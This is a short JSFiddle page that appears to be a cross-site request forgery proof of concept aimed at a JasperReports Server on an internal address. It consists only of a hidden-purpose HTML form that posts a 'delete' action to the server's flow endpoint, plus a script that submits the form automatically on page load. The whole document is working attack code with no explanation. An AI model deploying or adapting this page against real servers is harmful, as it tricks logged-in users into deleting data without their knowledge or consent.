JSFiddle - React, Tailwind, and code Playground
by mshufrich
HTML
<script src="http://code.jquery.com/jquery-2.1.0.min.js"></script>
<form id="copyFolder" action="http://192.168.88.13:8089/jasperserver-pro-restlogin/flow.html?_flowExecutionKey=e10s1&_eventId=delete" method="POST">
<input type="text" name="entity" value='{test}'/>
<input type="submit" value="OK"/>
</form>
JavaScript
window.document.forms[0].submit();